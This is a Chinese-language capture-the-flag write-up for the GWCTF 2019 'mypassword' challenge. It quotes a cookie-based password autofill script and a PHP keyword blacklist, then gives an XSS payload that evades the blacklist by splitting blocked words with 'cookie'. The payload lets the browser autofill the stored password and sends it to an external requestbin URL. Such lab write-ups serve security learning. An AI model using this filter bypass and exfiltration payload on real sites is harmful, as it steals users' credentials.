[GWCTF 2019]mypassword

打开网页

在./js/login.js中发现代码

if (document.cookie && document.cookie != '') {
    var cookies = document.cookie.split('; ');
    var cookie = {};
    for (var i = 0; i < cookies.length; i++) {
        var arr = cookies[i].split('=');
        var key = arr[0];
        cookie[key] = arr[1];
    }
    if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
        document.getElementsByName("username")[0].value = cookie['user'];
        document.getElementsByName("password")[0].value = cookie['psw'];
    }
}

用户名和密码都写入了表单
注册一个账号，发现admin被注册了，用admin1
登录进去之后，出现以下界面

 

在feedback.php发现代码

 

if(is_array($feedback)){
                echo "<script>alert('反馈不合法');</script>";
                return false;
            }
            $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
            foreach ($blacklist as $val) {
                while(true){
                    if(stripos($feedback,$val) !== false){
                        $feedback = str_ireplace($val,"",$feedback);
                    }else{
                        break;
                    }
                }
            }

 

过滤了一些东西

login.js中的记住密码功能会将读取cookie中的password

使用http://http.requestbin.buuoj.cn

构造

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/y6b4uwy6/?a="+psw;
</scrcookieipt>